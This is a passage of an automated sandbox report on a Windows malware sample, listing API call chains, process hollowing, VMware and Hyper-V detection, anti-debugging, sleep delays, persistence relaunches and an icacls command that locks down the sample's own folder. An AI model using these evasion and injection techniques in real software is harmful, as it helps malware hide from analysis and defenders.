        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00A5471C rdtsc 0_2_00A5471C
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeThread delayed: delay time: 660000Jump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-45022
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exe TID: 7064Thread sleep time: -660000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe TID: 6760Thread sleep count: 165 > 30
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeThread delayed: delay time: 660000Jump to behavior
        Source: C0XWmZAnYk.exe, 00000002.00000002.2063725097.0000000000607000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{u
        Source: C0XWmZAnYk.exe, 00000002.00000002.2063725097.0000000000624000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000009.00000002.2202422051.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000009.00000002.2202422051.0000000000682000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000003.2276097000.0000000000795000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276934324.0000000000795000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C0XWmZAnYk.exe, 00000002.00000002.2063725097.0000000000607000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: C0XWmZAnYk.exe, 00000002.00000002.2063725097.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
        Source: C0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
        Source: C0XWmZAnYk.exe, 0000000C.00000003.2276097000.0000000000795000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276934324.0000000000795000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
        Source: C0XWmZAnYk.exe, 00000006.00000002.2683012992.00000000008C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeAPI call chain: ExitProcess graph end nodegraph_2-45024
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00A5471C rdtsc 0_2_00A5471C
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00405660 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00405660
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042A57A
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_0040B240 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0040B240
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00A530A3 push dword ptr fs:[00000030h]0_2_00A530A3
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C30042 push dword ptr fs:[00000030h]0_2_00C30042
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00A6D0A3 push dword ptr fs:[00000030h]4_2_00A6D0A3
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB0042 push dword ptr fs:[00000030h]4_2_00CB0042
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00B790A3 push dword ptr fs:[00000030h]5_2_00B790A3
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C10042 push dword ptr fs:[00000030h]5_2_00C10042
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004278D5 GetProcessHeap,2_2_004278D5
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00405660 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00405660
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_004021B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004021B0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00C30110
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeMemory written: C:\Users\user\Desktop\C0XWmZAnYk.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeMemory written: C:\Users\user\Desktop\C0XWmZAnYk.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeMemory written: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeMemory written: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeMemory written: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe"Jump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe --TaskJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C580F6 cpuid 0_2_00C580F6
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_00C5C8B7
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_00C649EA
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_00C6394D
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00C70AB6
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00C63F87
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: EnumSystemLocalesW,2_2_004387C8
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: GetLocaleInfoW,2_2_0043884E
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: EnumSystemLocalesW,2_2_00437E27
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0042BF17
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,4_2_00CDC8B7
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,4_2_00CE49EA
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,4_2_00CE394D
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00CF0AB6
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_00CE3F87
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_00C3C8B7
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_00C449EA
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_00C4394D
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_00C50AB6
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_00C43F87
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00407160 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00407160
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_0042FE47
